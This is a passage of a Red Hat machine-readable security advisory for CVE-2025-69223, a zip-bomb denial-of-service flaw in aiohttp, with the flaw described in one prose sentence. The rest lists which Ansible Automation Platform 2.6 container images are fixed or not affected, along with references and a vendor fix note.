"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2427456"
}
],
"notes": [
{
"category": "description",
"text": "A decompression based denial of service flaw has been discovered in the AIOHTTP python library. Library versions 3.13.2 and below allow a zip bomb to be used to execute a DoS against the AIOHTTP server. An attacker may be able to send a compressed request that when decompressed by AIOHTTP could exhaust the host\u0027s memory.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "aiohttp: AIOHTTP\u0027s HTTP Parser auto_decompress feature is vulnerable to zip bomb",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-69223"
},
{
"category": "external",
"summary": "RHBZ#2427456",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2427456"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-69223",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-69223"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-69223",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69223"
},
{
"category": "external",
"summary": "https://github.com/aio-libs/aiohttp/commit/2b920c39002cee0ec5b402581779bbaaf7c9138a",
"url": "https://github.com/aio-libs/aiohttp/commit/2b920c39002cee0ec5b402581779bbaaf7c9138a"
},
{
"category": "external",
"summary": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-6mq8-rvhq-8wgg",
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-6mq8-rvhq-8wgg"
}
],
"release_date": "2026-01-05T22:00:17.715000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-01T18:20:27+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
